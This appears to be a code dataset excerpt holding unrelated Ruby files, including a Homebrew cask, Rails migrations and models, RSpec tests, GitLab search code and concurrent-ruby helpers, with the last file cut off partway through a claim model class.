hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1) |
---|---|---|---|---|---|
1108f763e84b1614659b350781b8916677a3cfe1 | 877 | cask 'omnigraffle' do
if MacOS.release <= :snow_leopard
version '5.4.4'
sha256 '7bcc64093f46bd4808b1a4cb86cf90c0380a5c5ffffd55ce8f742712818558df'
url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.6/OmniGraffle-#{version}.dmg"
elsif MacOS.release <= :mavericks
version '6.0.5'
sha256 'a2eff19909d1ba38a4f01b2beecbde2f31f4af43d30e06d2c6921ae8880f85bc'
url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.8/OmniGraffle-#{version}.dmg"
else
version '6.4.1'
sha256 '8f1c052e7100baca7a7cda3b5c09f7d3ab0ade7006d32fc193e97a95dee45f79'
url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.10/OmniGraffle-#{version}.dmg"
end
name 'OmniGraffle'
homepage 'https://www.omnigroup.com/omnigraffle/'
license :commercial
app 'OmniGraffle.app'
zap delete: '~/Library/Application Support/The Omni Group/OmniGraffle'
end
| 36.541667 | 92 | 0.759407 |
2677a8a4939cec67a536f2f7a1296012413771a8 | 151 | class CreateWeapons < ActiveRecord::Migration
def change
create_table :weapons do |t|
t.string :name
t.timestamps
end
end
end
| 15.1 | 45 | 0.668874 |
03c9602b6d500f821b2322709be204fb56316510 | 579 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Screening::SendFollowupMailer, type: :mailer do
describe 'notify' do
let(:role) { create(:role) }
let(:mail) { Screening::SendFollowupMailer.notify(role.id) }
it 'renders the subject' do
expect(mail.subject).to eq(I18n.t('dashboard.users.mailers.uncompleted.subject').to_s)
end
it 'renders the receiver email' do
expect(mail.to).to eq([role.user.email])
end
it 'renders the sender email' do
expect(mail.from).to eq(['[email protected]'])
end
end
end
| 25.173913 | 92 | 0.683938 |
bb33dbdb8eafab7c9c61fee78287370baa5724ca | 1,642 | # frozen_string_literal: true
module ElasticAPM
module Transport
RSpec.describe Headers do
let(:config) { Config.new }
subject { described_class.new(config) }
describe 'to_h' do
it 'constructs the default headers from config' do
expect(subject.to_h).to match('User-Agent': String)
end
context 'with a secret token' do
let(:config) { Config.new secret_token: 'TOKEN' }
it 'includes auth bearer' do
expect(subject.to_h).to match(
'User-Agent': String,
'Authorization': 'Bearer TOKEN'
)
end
end
context 'with an api key' do
let(:config) do
Config.new api_key: 'a_base64_encoded_string'
end
it 'includes api key' do
expect(subject.to_h).to match(
'User-Agent': String,
'Authorization': 'ApiKey a_base64_encoded_string'
)
end
end
end
describe 'chunked' do
it 'returns a modified copy' do
chunked = subject.chunked
expect(chunked).to_not be subject
expect(chunked.hash).to_not be subject.hash
expect(subject['Transfer-Encoding']).to be nil
expect(chunked['Transfer-Encoding']).to eq 'chunked'
expect(chunked['Content-Type']).to eq 'application/x-ndjson'
end
context 'with compression' do
it 'sets gzip header' do
chunked = subject.chunked
expect(chunked['Content-Encoding']).to eq 'gzip'
end
end
end
end
end
end
| 27.830508 | 70 | 0.563337 |
5d73bc4de795754c02307036857bbc0e9ab0aa88 | 1,880 | require "spec_helper"
describe Mongoid::Relations::Builders::Referenced::One do
let(:base) do
stub(:new_record? => false)
end
describe "#build" do
let(:criteria) do
Post.where("person_id" => object)
end
let(:metadata) do
stub(
:klass => Post,
:name => :post,
:foreign_key => "person_id",
:criteria => criteria,
:inverse_klass => Person
)
end
let(:builder) do
described_class.new(base, metadata, object)
end
context "when provided an id" do
let(:object_id) do
BSON::ObjectId.new
end
let(:object) do
object_id
end
let(:post) do
stub
end
before do
criteria.expects(:first).returns(post)
end
let!(:documents) do
builder.build
end
it "sets the document" do
documents.should eq(post)
end
end
context "when provided a object" do
let(:object) do
Post.new
end
let(:document) do
builder.build
end
it "returns the object" do
document.should eq(object)
end
end
end
describe "#build" do
let(:person) do
Person.new(:ssn => "345-12-1212")
end
context "when the document is not found" do
it "returns nil" do
person.game.should be_nil
end
end
context "when the document is persisted" do
before do
Mongoid.identity_map_enabled = true
person.save
end
after do
Mongoid.identity_map_enabled = false
end
let!(:game) do
Game.create(:person_id => person.id)
end
it "returns the document" do
person.game.should eq(game)
end
it "pulls the document from the identity map" do
person.game.should equal(game)
end
end
end
end
| 17.090909 | 57 | 0.559043 |
62dbb2d06d6d3f3a56716141f3b48f048d760e7a | 231 | # frozen_string_literal: true
Rails.application.routes.draw do
resources :organizations
root to: 'organizations#index'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
end
| 25.666667 | 101 | 0.78355 |
61d5445b3bfc3531eae9e252574d22c76df772db | 43 | module SinkUtility
VERSION = "0.1.2"
end
| 10.75 | 19 | 0.697674 |
2669adb8455cc9d17de5df05bb92f2436e96f90c | 4,724 | # frozen_string_literal: true
module Gitlab
class ProjectSearchResults < SearchResults
attr_reader :project, :repository_ref
def initialize(current_user, project, query, repository_ref = nil, per_page: 20)
@current_user = current_user
@project = project
@repository_ref = repository_ref.presence
@query = query
@per_page = per_page
end
def objects(scope, page = nil)
case scope
when 'notes'
notes.page(page).per(per_page)
when 'blobs'
paginated_blobs(blobs, page)
when 'wiki_blobs'
paginated_blobs(wiki_blobs, page)
when 'commits'
Kaminari.paginate_array(commits).page(page).per(per_page)
when 'users'
users.page(page).per(per_page)
else
super(scope, page, false)
end
end
def formatted_count(scope)
case scope
when 'blobs'
blobs_count.to_s
when 'notes'
formatted_limited_count(limited_notes_count)
when 'wiki_blobs'
wiki_blobs_count.to_s
when 'commits'
commits_count.to_s
else
super
end
end
def users
super.where(id: @project.team.members) # rubocop:disable CodeReuse/ActiveRecord
end
def blobs_count
@blobs_count ||= blobs.count
end
# rubocop: disable CodeReuse/ActiveRecord
def limited_notes_count
return @limited_notes_count if defined?(@limited_notes_count)
types = %w(issue merge_request commit snippet)
@limited_notes_count = 0
types.each do |type|
@limited_notes_count += notes_finder(type).limit(count_limit).count
break if @limited_notes_count >= count_limit
end
@limited_notes_count
end
# rubocop: enable CodeReuse/ActiveRecord
def wiki_blobs_count
@wiki_blobs_count ||= wiki_blobs.count
end
def commits_count
@commits_count ||= commits.count
end
def single_commit_result?
return false if commits_count != 1
counts = %i(limited_milestones_count limited_notes_count
limited_merge_requests_count limited_issues_count
blobs_count wiki_blobs_count)
counts.all? { |count_method| public_send(count_method).zero? } # rubocop:disable GitlabSecurity/PublicSend
end
private
def paginated_blobs(blobs, page)
results = Kaminari.paginate_array(blobs).page(page).per(per_page)
Gitlab::Search::FoundBlob.preload_blobs(results)
results
end
def blobs
return [] unless Ability.allowed?(@current_user, :download_code, @project)
@blobs ||= Gitlab::FileFinder.new(project, repository_project_ref).find(query)
end
def wiki_blobs
return [] unless Ability.allowed?(@current_user, :read_wiki, @project)
@wiki_blobs ||= begin
if project.wiki_enabled? && query.present?
unless project.wiki.empty?
Gitlab::WikiFileFinder.new(project, repository_wiki_ref).find(query)
else
[]
end
else
[]
end
end
end
def notes
@notes ||= notes_finder(nil)
end
# rubocop: disable CodeReuse/ActiveRecord
def notes_finder(type)
NotesFinder.new(@current_user, search: query, target_type: type, project: project).execute.user.order('updated_at DESC')
end
# rubocop: enable CodeReuse/ActiveRecord
def commits
@commits ||= find_commits(query)
end
def find_commits(query)
return [] unless Ability.allowed?(@current_user, :download_code, @project)
commits = find_commits_by_message(query)
commit_by_sha = find_commit_by_sha(query)
commits |= [commit_by_sha] if commit_by_sha
commits
end
def find_commits_by_message(query)
project.repository.find_commits_by_message(query)
end
def find_commit_by_sha(query)
key = query.strip
project.repository.commit(key) if Commit.valid_hash?(key)
end
# rubocop: disable CodeReuse/ActiveRecord
def project_ids_relation
Project.where(id: project).select(:id).reorder(nil)
end
# rubocop: enable CodeReuse/ActiveRecord
def filter_milestones_by_project(milestones)
return Milestone.none unless Ability.allowed?(@current_user, :read_milestone, @project)
milestones.where(project_id: project.id) # rubocop: disable CodeReuse/ActiveRecord
end
def repository_project_ref
@repository_project_ref ||= repository_ref || project.default_branch
end
def repository_wiki_ref
@repository_wiki_ref ||= repository_ref || project.wiki.default_branch
end
def issuable_params
super.merge(project_id: project.id)
end
end
end
| 26.689266 | 126 | 0.671677 |
f752426972e698ea6da32165a528a98481b499a7 | 254 | module Theblog
class ContentNodesController < Theblog::ApplicationController
skip_before_action :authenticate_user!, only: [:show]
def show
@node = ContentNode.by_parent(params[:category]).find_by!(slug: params[:slug])
end
end
end
| 25.4 | 84 | 0.732283 |
bb551bf856a320eddc60dccfc8159e920766127e | 594 | require 'auth'
module API
module ApiHelper
include Auth
def warden
env['warden']
end
def session
env['rack.session']
end
def authenticated
return true if warden.authenticated?
return if headers['Access-Token'].blank?
payload = decode_jwt(headers['Access-Token'])&.first
return unless payload
(@user = User.find_by(id: payload['id'])) && (@user.sub_admin? || @user.admin?)
end
def authenticated_admin
authenticated && @user.admin?
end
def current_user
warden.user || @user
end
end
end
| 17.470588 | 85 | 0.617845 |
081683916f3f766a7b05a548dd277404ef0d9fb5 | 418 | class Group
attr_reader :string, :individuals
def initialize(string)
@string = string.gsub(/\s+/, '')
@individuals = string.split(/\s+/)
end
def unique
string.split('').to_set.count
end
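# Count the letters that appear in every individual's answers (a running intersection across the group).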
def every
letters = individuals[0].split('')
individuals[1...(individuals.size)].each do |individual|
letters = individual
.split('')
.select { |i| letters.include?(i) }
end
letters.count
end
end | 17.416667 | 58 | 0.655502 |
335954be87dd56f954e24111d07c1104d152df9b | 400 | require 'spec_helper'
require './libraries/default'
describe Ark::GeneralOwner do
let(:subject) { described_class.new(resource) }
let(:resource) do
double(owner: 'owner',
group: 'group',
path: '/resource/path')
end
it 'generates the correct chown command for file ownership' do
expect(subject.command).to eq('chown -R owner:group /resource/path')
end
end
| 23.529412 | 72 | 0.6775 |
ff48a3532ab8990cef3dbcccdebe90b6689d3b18 | 309 | json.officials @officials do |official|
json.(official, :id, :name, :title, :image, :city_id, :bio, :street, :city_code, :state, :zip, :phone, :fax, :email, :facebook)
json.staff_members official.staff_members do |staff_member|
json.(staff_member, :id, :official_id, :name, :email, :title)
end
end
| 38.625 | 129 | 0.695793 |
1aa49d7a6af9bcb3f7d518e6805f9b3a967d762d | 725 | Rails.application.routes.draw do
root 'static_pages#home'
get '/help', to: 'static_pages#help'
get '/about', to: 'static_pages#about'
get '/contact', to: 'static_pages#contact'
get '/signup', to: 'users#new'
post '/signup', to: 'users#create'
get '/login', to: 'sessions#new'
post '/login', to: 'sessions#create'
delete '/logout', to: 'sessions#destroy'
resources :users do
member do
get :following, :followers
end
end
resources :account_activations, only: [:edit]
resources :password_resets, only: [:new, :create, :edit, :update]
resources :microposts, only: [:create, :destroy]
resources :relationships, only: [:create, :destroy]
end
| 30.208333 | 71 | 0.634483 |
1a4b7641549f68743670bddcc060a04ab0d66581 | 3,377 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rake db:seed (or created alongside the db with db:setup).
#
# Examples:
#
# cities = City.create([{ name: 'Chicago' }, { name: 'Copenhagen' }])
# Mayor.create(name: 'Emanuel', city: cities.first)
require 'factory_girl_rails'
require_relative '../test/support/factories'
FactoryGirl.create(:user, email: '[email protected]', password: 'secretpass', password_confirmation: 'secretpass')
['Adjustments Calculator', 'Transaction Processor', 'Flight Plan Recorder'].each do |description|
FactoryGirl.create(:quote, description: description)
end
Quote.first.tap do |quote|
FactoryGirl.create(:section, description: 'Engineering', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'Determine / validate data model and generate Entity Relationship Diagram', parent: section, min_hours: 2, max_hours: 4
FactoryGirl.create :item, description: 'Application modeling / high-level system planning - diagram each portion of the UI / wireframing', parent: section, min_hours: 4, max_hours: 8
FactoryGirl.create :item, description: "Generate user stories to outline the system's functionality from the business's perspective", parent: section, min_hours: 2, max_hours: 4
FactoryGirl.create :item, description: 'Server setup, SSL procurement, etc.', parent: section, min_hours: 0, max_hours: 0
end
FactoryGirl.create(:section, description: 'Design', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'UI/UX Design, Layout for main application, associated stylesheets / html mockups', parent: section, min_hours: 12, max_hours: 18
end
FactoryGirl.create(:section, description: 'Development', parent: quote).tap do |section|
FactoryGirl.create(:section, description: 'Supporting Library Development', parent: section).tap do |subsection|
FactoryGirl.create :item, description: 'Importer libraries (import CSV exports of all data needed for backend for calculation)', parent: subsection, min_hours: 8, max_hours: 10
FactoryGirl.create :item, description: 'Calculator library', parent: subsection, min_hours: 26, max_hours: 45
end
FactoryGirl.create(:section, description: 'Data Models', parent: section).tap do |subsection|
FactoryGirl.create :item, description: 'User authentication, registration, roles system - implementing Devise + CanCan', parent: subsection, min_hours: 0, max_hours: 0
FactoryGirl.create :item, description: 'Data models to support various import files (these should be basic)', parent: subsection, min_hours: 4, max_hours: 6
FactoryGirl.create :item, description: 'Forecast data model (to store a given forecast)', parent: subsection, min_hours: 6, max_hours: 10
end
end
FactoryGirl.create(:section, description: 'Testing', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'Supporting libraries - unit tests', parent: section, min_hours: 6, max_hours: 12
end
FactoryGirl.create(:section, description: 'QA', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'Cross Browser testing/fixes', parent: section, min_hours: 12, max_hours: 16
end
end
FactoryGirl.create :item_template, description: 'Default Template', min_hours: 0, max_hours: 0
| 64.942308 | 186 | 0.752739 |
ab4628bedb4256fd6529ffd48ddc31a593a82677 | 977 | Rails.application.configure do
config.cache_classes = true
config.eager_load = true
config.exceptions_app = routes
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
config.public_file_server.enabled = ENV["RAILS_SERVE_STATIC_FILES"].present?
config.assets.js_compressor = :uglifier
config.assets.compile = false
config.force_ssl = true
config.log_level = :debug
config.log_tags = [:request_id]
config.action_mailer.perform_caching = false
config.i18n.fallbacks = true
config.active_support.deprecation = :notify
config.log_formatter = ::Logger::Formatter.new
config.cache_store = :redis_cache_store
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 34.892857 | 78 | 0.781986 |
ed966c804e41e274c137d0df502a02a9d6c63b63 | 418 | OFFICIAL_TAPS = %w[
nginx
php
science
].freeze
OFFICIAL_CASK_TAPS = %w[
cask
versions
].freeze
OFFICIAL_CMD_TAPS = {
"homebrew/bundle" => ["bundle"],
"homebrew/test-bot" => ["test-bot"],
"homebrew/services" => ["services"],
}.freeze
DEPRECATED_OFFICIAL_TAPS = %w[
apache
binary
completions
devel-only
dupes
emacs
fuse
games
gui
head-only
python
tex
versions
x11
].freeze
| 12.294118 | 38 | 0.655502 |
08f381a4c8b06fa17529fb321df50454c07dba12 | 2,644 | # encoding: UTF-8
require "forwardable"
module Spontaneous
class Error < StandardError; end
class UnknownTypeException < Error
def initialize(parent, type)
super("Unknown content type '#{type}' requested in class #{parent}")
end
end
class UnknownStyleException < Error
def initialize(style_name, klass)
super("Unknown style '#{style_name}' for class #{klass}")
end
end
# raised when trying to show something that is not showable due to
# ancestor being hidden
class NotShowable < Error
attr_reader :content, :hidden_ancestor_id
def initialize(content, hidden_ancestor_id)
@content, @hidden_ancestor_id = content, hidden_ancestor_id
super("#{content_description(@content)} is not showable as it is hidden by the ancestor #{content_description(hidden_ancestor)}")
end
def content_description(content)
%[#{ content.class } id #{content.id} (#{content.page.path})]
end
def hidden_ancestor
@content.content_model.get(@hidden_ancestor_id)
end
end
class UnknownLayoutError < Error
def initialize(parent_class, layout_name)
@parent_class, @layout_name = parent_class, layout_name
end
end
class UnknownOutputException < Error
def initialize(content_class, unsupported_output_name)
super("Type '#{content_class}' does not output '#{unsupported_output_name}'")
end
end
class UnsupportedFormatException < Error
def initialize(style, unsupported_format)
super("'#{unsupported_format}' format not supported by style '#{style.name}'.\nTemplate path: #{style.directory}\n")
end
end
class InvalidPrototypeDefinitionError < Error; end
class AnonymousRootException < Error
def initialize
super("Content roots must have a valid slug")
end
end
class SingletonException < Error
def initialize(type)
super("Attempt to create a second instance of #{type}")
end
end
class SchemaModificationError < Error
extend Forwardable
attr_reader :modification
def initialize(modification)
@modification = modification
end
def_delegators :@modification, :added_classes, :removed_classes
def_delegators :@modification, :added_fields, :removed_fields
def_delegators :@modification, :added_boxes, :removed_boxes
def_delegators :@modification, :added_styles, :removed_styles
def_delegators :@modification, :added_layouts, :removed_layouts
end
class ReadOnlyScopeModificationError < Error
def initialize(box)
super("Attempt to modify the contents of box #{box.inspect} within a read-only scope")
end
end
end
| 28.12766 | 135 | 0.722769 |
ed92e20e36b4d7c7074d05a8708863c0a8814f14 | 1,808 | require 'spec_helper'
describe Tile do
it 'is initializable' do
expect(Tile.new).not_to be_nil
end
describe '#text' do
it 'is equal to what it was initialized with' do
expect(Tile.new('abc').text).to eq 'abc'
end
end
describe '#x' do
it 'defaults to 0' do
expect(Tile.new.x).to be 0
end
it 'is otherwise what the tile was instantiated with' do
expect(Tile.new('##', 999).x).to be 999
end
end
describe '#y' do
it 'defaults to 0' do
expect(Tile.new.y).to be 0
end
it 'is otherwise what the tile was instantiated with' do
expect(Tile.new('##', 999, 123).y).to be 123
end
end
describe '#cost' do
it 'defaults to 100' do
expect(Tile.new.cost).to be 100
end
it 'is writable' do
t = Tile.new
expect { t.cost=1000 }.to change { t.cost }.from(100).to 1000
end
end
describe '#nabes' do
it 'is an array of [@north, @south, @east, @west], minus the nils' do
t = Tile.new 'tile'
n = Tile.new 'north'
s = Tile.new 'south'
e = Tile.new 'east'
w = Tile.new 'west'
t.north = n; t.south = s; t.east = e; t.west = w
expect(t.nabes).to eq [n, s, e, w]
t.north = nil
expect(t.nabes.length).to be 3
expect(t.north).to be FalseTile
end
end
%w(north south east west).each do |dir|
describe "##{dir}" do
let(:t) { Tile.new }
it 'returns the FalseTile class if nil/unset/false' do
expect(t.send dir).to be FalseTile
end
it 'returns whatever truthy value set to it' do
t.send "#{dir}=", 'anything'
expect(t.send dir).to eq 'anything'
dir_tile = Tile.new
t.send "#{dir}=", dir_tile
expect(t.send dir).to be dir_tile
end
end
end
end
| 22.6 | 73 | 0.576881 |
6ad76693bb53f5f8fbdeac7497e7c4dbd86107a3 | 3,122 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20150512205557) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "issues", force: :cascade do |t|
t.integer "user_id"
t.string "os"
t.string "time_of_issue"
t.string "date_of_issue"
t.string "security_suite_used"
t.string "city_of_attack"
t.string "country_of_attack"
t.string "industry_of_attack"
t.string "state_of_attack"
t.string "believed_source"
t.string "title"
t.string "description"
t.string "image1"
t.string "image2"
t.string "image3"
t.string "image4"
t.string "video1"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "posts", force: :cascade do |t|
t.integer "user_id"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "solutions", force: :cascade do |t|
t.string "user_id"
t.string "issue_id"
t.string "title"
t.string "description"
t.string "image1"
t.string "image2"
t.string "image3"
t.string "image4"
t.string "video1"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "users", force: :cascade do |t|
t.string "first_name"
t.string "last_name"
t.string "e_mail"
t.string "city"
t.string "state"
t.string "zipcode"
t.string "country"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0, null: false
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.inet "current_sign_in_ip"
t.inet "last_sign_in_ip"
end
add_index "users", ["email"], name: "index_users_on_email", unique: true, using: :btree
add_index "users", ["reset_password_token"], name: "index_users_on_reset_password_token", unique: true, using: :btree
end
| 35.477273 | 119 | 0.665279 |
615775283fa76ba7566669ffb13a2abdb73604d1 | 128 | class AddNameEnToCategories < ActiveRecord::Migration[4.2]
def change
add_column :categories, :name_en, :string
end
end
| 21.333333 | 58 | 0.757813 |
b95e3ee9c47a34d898c19fc5266be466c954d202 | 1,108 | module Concurrent
module Synchronization
# @!visibility private
module MriAttrVolatile
def self.included(base)
base.extend(ClassMethods)
end
module ClassMethods
def attr_volatile(*names)
names.each do |name|
ivar = :"@volatile_#{name}"
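# Define a plain reader/writer pair backed by @volatile_<name>; on MRI the GVL guarantees ivar visibility across threads (see full_memory_barrier below).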
class_eval <<-RUBY, __FILE__, __LINE__ + 1
def #{name}
#{ivar}
end
def #{name}=(value)
#{ivar} = value
end
RUBY
end
names.map { |n| [n, :"#{n}="] }.flatten
end
end
def full_memory_barrier
# relying on undocumented behavior of CRuby, GVL acquire has lock which ensures visibility of ivars
# https://github.com/ruby/ruby/blob/ruby_2_2/thread_pthread.c#L204-L211
end
end
# @!visibility private
# @!macro internal_implementation_note
class MriObject < AbstractObject
include MriAttrVolatile
def initialize
# nothing to do
end
end
end
end
| 24.622222 | 108 | 0.535199 |
285368552fc761a9c3eeeed5125202ed51e10664 | 2,297 | require 'bundler'
if Gem::Version.create(RUBY_VERSION) < Gem::Version.create("3.2.0")
require 'pry'
end
require 'rspec-parameterized'
require 'simplecov'
require 'psych'
SimpleCov.start do
add_filter 'spec'
end
SimpleCov.minimum_coverage 99
require 'openapi_parser'
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
def load_yaml_file(path)
Psych.safe_load(File.read(path), permitted_classes: [Date, Time])
end
def normal_schema
load_yaml_file('./spec/data/normal.yml')
end
def broken_reference_schema
load_yaml_file('./spec/data/reference-broken.yaml')
end
def petstore_schema
load_yaml_file(petstore_schema_path)
end
def petstore_schema_path
'./spec/data/petstore-expanded.yaml'
end
def petstore_with_discriminator_schema
load_yaml_file('./spec/data/petstore-with-discriminator.yaml')
end
def petstore_with_mapped_polymorphism_schema
load_yaml_file('./spec/data/petstore-with-mapped-polymorphism.yaml')
end
def petstore_with_polymorphism_schema
load_yaml_file('./spec/data/petstore-with-polymorphism.yaml')
end
def json_petstore_schema_path
'./spec/data/petstore.json'
end
def json_with_unsupported_extension_petstore_schema_path
'./spec/data/petstore.json.unsupported_extension'
end
def yaml_with_unsupported_extension_petstore_schema_path
'./spec/data/petstore.yaml.unsupported_extension'
end
def path_item_ref_schema_path
'./spec/data/path-item-ref.yaml'
end
def path_item_ref_schema
load_yaml_file(path_item_ref_schema_path)
end
def build_validate_test_schema(new_properties)
b = load_yaml_file('./spec/data/validate_test.yaml')
obj = b['paths']['/validate_test']['post']['requestBody']['content']['application/json']['schema']['properties']
obj.merge!(change_string_key(new_properties))
b
end
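# Recursively convert hash keys to strings (descending into nested hashes and arrays) so the merged properties match the string-keyed YAML data.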
def change_string_key(hash)
new_data = hash.map do |k, v|
if v.kind_of?(Hash)
[k.to_s, change_string_key(v)]
elsif v.kind_of?(Array)
[k.to_s, v.map { |child| change_string_key(child) }]
else
[k.to_s, v]
end
end
new_data.to_h
end
| 22.742574 | 114 | 0.77057 |
e22c0cfcc25566742999a696166afb4db87b5670 | 1,967 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "coindcx/version"
Gem::Specification.new do |spec|
spec.name = "coindcx"
spec.version = Coindcx::VERSION
spec.authors = ["Snm Maurya"]
spec.email = ["[email protected]"]
spec.summary = %q{A Ruby library to access coindcx exchange APIs.}
spec.description = %q{An official Ruby library to access coindcx exchange APIs, includes REST and WebSockets.}
spec.homepage = "https://github.com/coindcx-official/coindcx-ruby-client"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "https://rubygems.org/gems/coindcx-ruby-client"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/coindcx-official/coindcx-ruby-client"
spec.metadata["changelog_uri"] = "https://github.com/coindcx-official/coindcx-ruby-client"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 2.0"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "openssl", "~> 2.1", ">= 2.1.2"
end | 45.744186 | 114 | 0.685816 |
ffc87e4412de9828194d133e99711644b66f3218 | 7,461 | # == Schema Information
#
# Table name: claims
#
# id :integer not null, primary key
# additional_information :text
# apply_vat :boolean
# state :string
# last_submitted_at :datetime
# case_number :string
# advocate_category :string
# first_day_of_trial :date
# estimated_trial_length :integer default(0)
# actual_trial_length :integer default(0)
# fees_total :decimal(, ) default(0.0)
# expenses_total :decimal(, ) default(0.0)
# total :decimal(, ) default(0.0)
# external_user_id :integer
# court_id :integer
# offence_id :integer
# created_at :datetime
# updated_at :datetime
# valid_until :datetime
# cms_number :string
# authorised_at :datetime
# creator_id :integer
# evidence_notes :text
# evidence_checklist_ids :string
# trial_concluded_at :date
# trial_fixed_notice_at :date
# trial_fixed_at :date
# trial_cracked_at :date
# trial_cracked_at_third :string
# source :string
# vat_amount :decimal(, ) default(0.0)
# uuid :uuid
# case_type_id :integer
# form_id :string
# original_submission_date :datetime
# retrial_started_at :date
# retrial_estimated_length :integer default(0)
# retrial_actual_length :integer default(0)
# retrial_concluded_at :date
# type :string
# disbursements_total :decimal(, ) default(0.0)
# case_concluded_at :date
# transfer_court_id :integer
# supplier_number :string
# effective_pcmh_date :date
# legal_aid_transfer_date :date
# allocation_type :string
# transfer_case_number :string
# clone_source_id :integer
# last_edited_at :datetime
# deleted_at :datetime
# providers_ref :string
# disk_evidence :boolean default(FALSE)
# fees_vat :decimal(, ) default(0.0)
# expenses_vat :decimal(, ) default(0.0)
# disbursements_vat :decimal(, ) default(0.0)
# value_band_id :integer
# retrial_reduction :boolean default(FALSE)
#
module Claim
class LitigatorClaim < BaseClaim
route_key_name 'litigators_claim'
validates_with ::Claim::LitigatorClaimValidator, unless: proc { |c| c.disable_for_state_transition.eql?(:all) }
validates_with ::Claim::LitigatorSupplierNumberValidator, if: proc { |c| c.draft? }
validates_with ::Claim::LitigatorClaimSubModelValidator
has_one :fixed_fee,
foreign_key: :claim_id,
class_name: 'Fee::FixedFee',
dependent: :destroy,
inverse_of: :claim,
validate: proc { |claim| claim.step_validation_required?(:fixed_fees) }
has_one :warrant_fee, foreign_key: :claim_id, class_name: 'Fee::WarrantFee', dependent: :destroy, inverse_of: :claim
has_one :graduated_fee,
foreign_key: :claim_id,
class_name: 'Fee::GraduatedFee',
dependent: :destroy,
inverse_of: :claim,
validate: proc { |claim| claim.step_validation_required?(:graduated_fees) }
has_one :interim_claim_info,
foreign_key: :claim_id,
dependent: :destroy,
inverse_of: :claim,
validate: proc { |claim| claim.step_validation_required?(:miscellaneous_fees) }
accepts_nested_attributes_for :fixed_fee, reject_if: :all_blank, allow_destroy: false
accepts_nested_attributes_for :warrant_fee, reject_if: :all_blank, allow_destroy: false
accepts_nested_attributes_for :graduated_fee, reject_if: :all_blank, allow_destroy: false
accepts_nested_attributes_for :interim_claim_info, reject_if: :all_blank, allow_destroy: false
before_validation do
assign_total_attrs
end
SUBMISSION_STAGES = [
{
name: :case_details,
transitions: [
{ to_stage: :defendants }
]
},
{
name: :defendants,
transitions: [
{
to_stage: :offence_details,
condition: ->(claim) { !claim.fixed_fee_case? }
},
{
to_stage: :fixed_fees,
condition: ->(claim) { claim.fixed_fee_case? }
}
],
dependencies: %i[case_details]
},
{
name: :offence_details,
transitions: [
{ to_stage: :graduated_fees }
],
dependencies: %i[case_details defendants]
},
{
name: :fixed_fees,
transitions: [
{ to_stage: :miscellaneous_fees }
],
dependencies: %i[case_details defendants]
},
{
name: :graduated_fees,
transitions: [
{ to_stage: :miscellaneous_fees }
],
dependencies: %i[case_details defendants offence_details]
},
{
name: :miscellaneous_fees,
transitions: [
{ to_stage: :disbursements }
]
},
{
name: :disbursements,
transitions: [
{ to_stage: :travel_expenses }
]
},
{
name: :travel_expenses,
transitions: [
{ to_stage: :supporting_evidence }
]
},
{ name: :supporting_evidence }
].freeze
def lgfs?
self.class.lgfs?
end
def final?
true
end
# Fixed Fee Adder requires a fixed_fees method
def fixed_fees
fixed_fee.nil? ? [] : [fixed_fee]
end
def eligible_case_types
CaseType.lgfs
end
def eligible_basic_fee_types
Fee::BasicFeeType.lgfs
end
def eligible_misc_fee_types
Claims::FetchEligibleMiscFeeTypes.new(self).call
end
def eligible_fixed_fee_types
